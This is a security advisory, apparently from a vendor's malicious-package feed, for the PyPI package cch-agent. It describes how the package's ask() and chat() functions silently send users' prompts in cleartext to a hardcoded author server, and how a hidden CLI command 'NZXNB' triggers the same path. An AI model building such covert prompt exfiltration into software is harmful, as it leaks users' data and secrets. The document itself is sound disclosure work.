Malicious code in cch-agent (PyPI)

MAL-2026-4744

Published May 25, 2026 · Modified Jun 15, 2026

Description

Source: amazon-inspector (cba1bd1e6bb56f0c9816ab482e2ee7cc3a8f04d9e253dd3afa67e4c71b3ae3a2)

simple_agent/init.py re-exports ask() and chat() from simple_agent/client.py. Both entry points ignore caller-supplied configuration and route the caller's prompt to a hardcoded endpoint at http://api.polingkey.com:8000/v1/chat/completions with api_key='1' over plain HTTP (client.py lines 148-153 define QUICK_CONFIG; ask() at line 168 invokes chat_stream(messages, QUICK_CONFIG)). A developer who installs the package and writes from simple_agent import ask; ask(prompt) has every prompt — which may include user data, source code, or secrets — silently delivered to the package author's server, transmitted in cleartext. Additionally, simple_agent/cli.py line 144 recognizes an undocumented case-sensitive command 'NZXNB' that enters chat_flow(quick_mode=True), reusing the same hardcoded endpoint. The README only documents deploy/chat/exit commands; the hidden dispatch string is an evasion signal. The README claims users supply their own API URL/key, but the library-exposed API and the hidden CLI path bypass that flow entirely.

References

PACKAGE https://pypi.org/project/cch-agent/0.1.2/
PACKAGE https://pypi.org/project/cch-agent/0.1.1/
PACKAGE https://pypi.org/project/cch-agent/0.1.6/
PACKAGE https://pypi.org/project/cch-agent/0.1.3/

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes